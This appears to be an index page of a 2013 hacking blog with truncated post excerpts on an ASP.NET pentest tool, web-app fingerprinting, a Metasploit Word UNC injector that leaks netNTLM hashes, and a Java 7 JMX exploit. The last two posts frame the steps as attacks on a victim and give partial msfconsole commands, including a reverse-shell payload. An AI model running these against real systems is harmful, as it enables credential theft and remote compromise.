Sunday, March 24, 2013

ASP.NET web-application Testing

Lens is an open-source ethical hacking tool specialized for penetration testing of ASP.NET web applications. Lens is written in WPF 4, and its internal modular architecture allows us to easily add new tests to the system. You can download the source code from the following website: http://ethicalhackingaspnet.codeplex.com/releases/view/52623

Currently the following tests are available:
(1) Viewstate eavesdropping & information disclosure
(2) Session Fixation
(3) Oracle...

Tuesday, March 19, 2013

Web-application Fingerprinting

Methods of Web Application Fingerprinting

Historically, identification of open-source applications has been easier, as the behavior patterns and all the source code are publicly open. In the early days, web application identification was as simple as looking in the footer of the page for text like “Powered by <XYZ>”. However, as more and more server admins became aware of this simple stuff, the pen testers' approach became more complex towards...

Friday, March 8, 2013

Microsoft Word UNC Path Injector

This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed, the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007 and 2010 as of January 2013. In order to get the hashes, the auxiliary/server/capture/smb module can be used.

First hack the victim PC using Metasploit.

msfconsole
use auxiliary/docx/word_unc_injector
msf...

Sunday, March 3, 2013

Hack Remote P.C. using latest java vulnerability

JAVA APPLET JMX REMOTE CODE EXECUTION

This vulnerability was exploited in February 2013. Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run an unsigned applet without displaying any warning to the user. Any OS which is running Java 7 Update 10 is exploitable. The attacker only requires Metasploit.

Open your terminal and type the following code:

msfconsole
use exploit/windows/browser/java_jre17_jmxbean_2
msf exploit (java_jre17_jmxbean_2)>set payload java/shell_reverse_tcp...